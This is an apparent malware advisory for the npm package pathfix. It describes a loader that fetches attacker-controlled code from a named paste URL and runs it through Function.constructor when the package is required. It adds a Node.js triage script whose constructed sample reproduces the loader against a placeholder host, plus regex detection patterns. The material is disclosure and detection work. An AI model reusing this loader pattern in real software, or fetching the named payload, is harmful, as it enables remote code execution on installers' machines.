MAL-2026-5989
Malicious code in pathfix (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (44585f45909a087f0880fc714e7fdc0977285884ea381e29c7b450ae7d5c2683)

On `require('pathfix')`, index.js auto-invokes initPlugin(), which performs an HTTP GET to https://jsonkeeper.com/b/T1SVX, parses the response as JSON, and passes the `cookie` field to `new Function.constructor('require', ...)`, immediately invoking the resulting function with the package's own `require`. Because `Function.constructor` is `Function` itself, this is an obfuscated `new Function('require', code)`: the fetched string is compiled as a function body and runs with full Node.js privileges (filesystem, child_process, network) on the installer's machine the moment the package is loaded. The jsonkeeper paste is attacker-mutable, so the code that runs is whatever the attacker has placed at that URL at that moment; two installs of the same version can behave differently, and a static scan of the tarball shows only the loader, never the payload.

The package metadata describes itself as 'Stylus porting of normalize.css' and declares unrelated dependencies (express, sqlite3, axios, request); only `request` is actually used, and only to fetch the remote payload. This is a cover-story / trojan pattern: the description and dependency list are dressed up to look like a plausible front-end utility. Anyone who installs and requires this package executes the attacker's current payload.
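As an added example (not part of this advisory, and not code from the pathfix package or from Amazon Inspector), the Node.js script below is a static triage pass for the three traits described above: dynamic code construction (`new Function`, `Function.constructor`, `eval`), an outbound HTTP(S) URL literal in module code, and declared dependencies that are never `require`d anywhere. It also checks the identity `Function.constructor === Function`, which is why a grep for the plain `new Function(` spelling misses this loader. The package.json and index.js it scans are constructed to mirror the described pattern, with a placeholder package name and URL; the detection is regex-based, so it is a triage aid rather than a JavaScript parser.

```javascript
'use strict';

// Added example for this advisory, not code from the pathfix package or from
// Amazon Inspector. Regex-based triage for the remote-code-loader pattern
// described above; it flags traits for a human to review, it does not prove
// malice.

// Constructed sample inputs that mirror the described pattern. The package
// name and URL are placeholders, not the real package or the real paste.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'sample-trojan',
  description: 'Stylus porting of normalize.css',
  main: 'index.js',
  dependencies: { express: '^4.0.0', sqlite3: '^5.0.0', axios: '^1.0.0', request: '^2.88.0' },
});

const SAMPLE_INDEX_JS = `
const request = require('request');
function initPlugin() {
  request.get('https://paste.example.invalid/b/XXXX', (err, res, body) => {
    const data = JSON.parse(body);
    new Function.constructor('require', data.cookie)(require);
  });
}
initPlugin();
`;

// A benign control (also constructed): declares one dependency, uses it,
// fetches nothing and compiles no code from strings.
const CLEAN_PACKAGE_JSON = JSON.stringify({
  name: 'sample-clean',
  dependencies: { express: '^4.0.0' },
});
const CLEAN_INDEX_JS = `
const express = require('express');
module.exports = () => express();
`;

const DYNAMIC_CODE = /\bFunction\s*\.\s*constructor\b|\bnew\s+Function\s*\(|\beval\s*\(/g;
const REMOTE_URL = /https?:\/\/[^\s'"`)]+/g;
const REQUIRE_CALL = /\brequire\s*\(\s*['"]([^'"]+)['"]\s*\)/g;

// `Function.constructor` is `Function` itself, so `new Function.constructor(...)`
// is just `new Function(...)` spelled to dodge a grep for the plain form.
function functionConstructorIsFunction() {
  return Function.constructor === Function;
}

function findDynamicCode(src) {
  return [...src.matchAll(DYNAMIC_CODE)].map((m) => m[0].replace(/\s+/g, ''));
}

function findRemoteUrls(src) {
  return [...src.matchAll(REMOTE_URL)].map((m) => m[0]);
}

// Package names actually required; relative paths are local files, not deps.
function requiredPackages(src) {
  const names = new Set();
  for (const m of src.matchAll(REQUIRE_CALL)) {
    const spec = m[1];
    if (spec.startsWith('.') || spec.startsWith('/')) continue;
    const parts = spec.split('/');
    names.add(spec.startsWith('@') ? parts.slice(0, 2).join('/') : parts[0]);
  }
  return names;
}

// Declared in package.json but never required: the cover-story signal.
function unusedDependencies(pkgJsonText, sources) {
  const declared = Object.keys(JSON.parse(pkgJsonText).dependencies || {});
  const used = new Set(sources.flatMap((s) => [...requiredPackages(s)]));
  return declared.filter((d) => !used.has(d)).sort();
}

function triage(pkgJsonText, sources) {
  const dynamicCode = sources.flatMap(findDynamicCode);
  const remoteUrls = sources.flatMap(findRemoteUrls);
  const unusedDeps = unusedDependencies(pkgJsonText, sources);
  const findings = [];
  if (dynamicCode.length) findings.push('dynamic-code');
  if (remoteUrls.length) findings.push('remote-url');
  // Fetch plus compile-from-string is the remote-code-loader shape itself.
  if (dynamicCode.length && remoteUrls.length) findings.push('remote-code-loader');
  if (unusedDeps.length) findings.push('unused-dependencies');
  return { dynamicCode, remoteUrls, unusedDeps, findings };
}

console.log(JSON.stringify(triage(SAMPLE_PACKAGE_JSON, [SAMPLE_INDEX_JS]), null, 2));
console.log(JSON.stringify(triage(CLEAN_PACKAGE_JSON, [CLEAN_INDEX_JS]), null, 2));
```

Run it with node. Against the constructed trojan sample it reports all four findings (including the three never-required dependencies axios, express and sqlite3); against the clean control it reports none. To use it on a real tarball, replace the sample strings with the contents of package.json and every .js file in the extracted package, remembering that what it can find is the loader, not the payload, which lives at the remote URL.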
Affected packages
No fixed version has been published for pathfix (npm). The loader described above ships in the package's own index.js and fires on `require`, so pinning only helps if you have inspected that version's source yourself; otherwise remove the package and switch to an alternative. Check lockfiles as well as package.json, since the package may be pulled in transitively.